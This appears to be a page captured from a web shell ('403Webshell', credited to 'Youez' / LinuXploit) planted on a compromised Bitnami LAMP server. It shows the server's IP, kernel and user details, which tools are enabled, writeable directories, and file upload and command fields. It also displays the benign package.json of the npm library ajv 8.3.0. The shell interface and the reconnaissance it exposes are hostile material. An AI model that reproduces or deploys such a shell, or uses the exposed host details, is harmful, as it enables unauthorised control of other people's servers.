403Webshell
Server IP : 34.87.99.72  /  Your IP : 216.73.217.31
Web Server : Apache/2.4.46 (Unix) OpenSSL/1.1.1n
System : Linux zlock-bitnami-lamp-prod-v2-vm 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
User : bitnami ( 1000)
PHP Version : 7.4.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /opt/bitnami/apache/htdocs/app/node_modules/table/node_modules/ajv/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/bitnami/apache/htdocs/app/node_modules/table/node_modules/ajv/package.json
{
  "_from": "ajv@^8.0.1",
  "_id": "ajv@8.3.0",
  "_inBundle": false,
  "_integrity": "sha512-RYE7B5An83d7eWnDR8kbdaIFqmKCNsP16ay1hDbJEU+sa0e3H9SebskCt0Uufem6cfAVu7Col6ubcn/W+Sm8/Q==",
  "_location": "/table/ajv",
  "_phantomChildren": {},
  "_requested": {
    "type": "range",
    "registry": true,
    "raw": "ajv@^8.0.1",
    "name": "ajv",
    "escapedName": "ajv",
    "rawSpec": "^8.0.1",
    "saveSpec": null,
    "fetchSpec": "^8.0.1"
  },
  "_requiredBy": [
    "/table"
  ],
  "_resolved": "https://registry.npmjs.org/ajv/-/ajv-8.3.0.tgz",
  "_shasum": "25ee7348e32cdc4a1dbb38256bf6bdc451dd577c",
  "_spec": "ajv@^8.0.1",
  "_where": "/opt/bitnami/apache/htdocs/app/node_modules/table",
  "author": {
    "name": "Evgeny Poberezkin"
  },
  "bugs": {
    "url": "https://github.com/ajv-validator/ajv/issues"
  },
  "bundleDependencies": false,
  "collective": {
    "type": "opencollective",
    "url": "https://opencollective.com/ajv"
  },
  "dependencies": {
    "fast-deep-equal": "^3.1.1",
    "json-schema-traverse": "^1.0.0",
    "require-from-string": "^2.0.2",
    "uri-js": "^4.2.2"
  },
  "deprecated": false,
  "description": "Another JSON Schema Validator",
  "devDependencies": {
    "@ajv-validator/config": "^0.3.0",
    "@rollup/plugin-commonjs": "^18.0.0",
    "@rollup/plugin-json": "^4.1.0",
    "@rollup/plugin-node-resolve": "^13.0.0",
    "@rollup/plugin-typescript": "^8.2.1",
    "@types/chai": "^4.2.12",
    "@types/mocha": "^8.0.3",
    "@types/node": "^15.0.2",
    "@types/require-from-string": "^1.2.0",
    "@typescript-eslint/eslint-plugin": "^3.8.0",
    "@typescript-eslint/parser": "^3.8.0",
    "@vuepress/shared-utils": "^1.8.2",
    "ajv-formats": "^2.0.0",
    "chai": "^4.0.1",
    "cross-env": "^7.0.2",
    "dayjs": "^1.10.4",
    "dayjs-plugin-utc": "^0.1.2",
    "eslint": "^7.8.1",
    "eslint-config-prettier": "^7.0.0",
    "glob": "^7.0.0",
    "husky": "^6.0.0",
    "if-node-version": "^1.0.0",
    "jimp": "^0.16.1",
    "js-beautify": "^1.7.3",
    "json-schema-test": "^2.0.0",
    "karma": "^5.0.0",
    "karma-chrome-launcher": "^3.0.0",
    "karma-mocha": "^2.0.0",
    "lint-staged": "^10.2.11",
    "mocha": "^8.0.1",
    "node-fetch": "^2.6.1",
    "nyc": "^15.0.0",
    "prettier": "^2.0.5",
    "rollup": "^2.44.0",
    "rollup-plugin-terser": "^7.0.2",
    "ts-node": "^9.0.0",
    "tsify": "^5.0.2",
    "typescript": "^4.2.0",
    "vuepress": "^1.8.2"
  },
  "files": [
    "lib/",
    "dist/",
    ".runkit_example.js"
  ],
  "funding": {
    "type": "github",
    "url": "https://github.com/sponsors/epoberezkin"
  },
  "homepage": "https://ajv.js.org",
  "husky": {
    "hooks": {
      "pre-commit": "lint-staged && npm test"
    }
  },
  "keywords": [
    "JSON",
    "schema",
    "validator",
    "validation",
    "jsonschema",
    "json-schema",
    "json-schema-validator",
    "json-schema-validation"
  ],
  "license": "MIT",
  "lint-staged": {
    "*.{json,yaml,js,ts}": "prettier --write"
  },
  "main": "dist/ajv.js",
  "name": "ajv",
  "nyc": {
    "exclude": [
      "**/spec/**",
      "node_modules"
    ],
    "reporter": [
      "lcov",
      "text-summary"
    ]
  },
  "prettier": "@ajv-validator/config/prettierrc.json",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/ajv-validator/ajv.git"
  },
  "runkitExampleFilename": ".runkit_example.js",
  "scripts": {
    "benchmark": "npm i && npm run build && npm link && cd ./benchmark && npm link ajv && npm i && node ./jtd",
    "build": "rm -rf dist && tsc && cp -r lib/refs dist && rm dist/refs/json-schema-2019-09/index.ts && rm dist/refs/json-schema-2020-12/index.ts && rm dist/refs/jtd-schema.ts",
    "bundle": "rm -rf bundle && rollup -c",
    "docs:build": "./scripts/prepare-site && vuepress build docs",
    "docs:dev": "./scripts/prepare-site && vuepress dev docs",
    "eslint": "eslint \"lib/**/*.ts\" \"spec/**/*.*s\" scripts --ignore-pattern spec/JSON-Schema-Test-Suite",
    "json-tests": "rm -rf spec/_json/*.js && node scripts/jsontests",
    "prepublish": "npm run build",
    "prettier:check": "prettier --list-different \"./**/*.{json,yaml,js,ts}\"",
    "prettier:write": "prettier --write \"./**/*.{json,yaml,js,ts}\"",
    "test": "npm run json-tests && npm run prettier:check && npm run eslint && npm link && npm link ajv && npm run test-cov",
    "test-all": "npm run test-cov && if-node-version 12 npm run test-browser",
    "test-browser": "rm -rf .browser && npm run bundle && scripts/prepare-tests && karma start",
    "test-ci": "AJV_FULL_TEST=true npm test",
    "test-codegen": "nyc cross-env TS_NODE_PROJECT=spec/tsconfig.json mocha -r ts-node/register 'spec/codegen.spec.ts' -R spec",
    "test-cov": "nyc npm run test-spec",
    "test-debug": "npm run test-spec -- --inspect-brk",
    "test-karma": "karma start",
    "test-spec": "cross-env TS_NODE_PROJECT=spec/tsconfig.json mocha -r ts-node/register \"spec/**/*.spec.{ts,js}\" -R dot -g \\(.recursiveRef.with.no..recursiveAnchor\\|.dynamicRef.with.no..dynamicAnchor\\).in.the.initial.target.schema.resource -i"
  },
  "types": "dist/ajv.d.ts",
  "version": "8.3.0"
}

Youez - 2016 - github.com/yon3zu
LinuXploit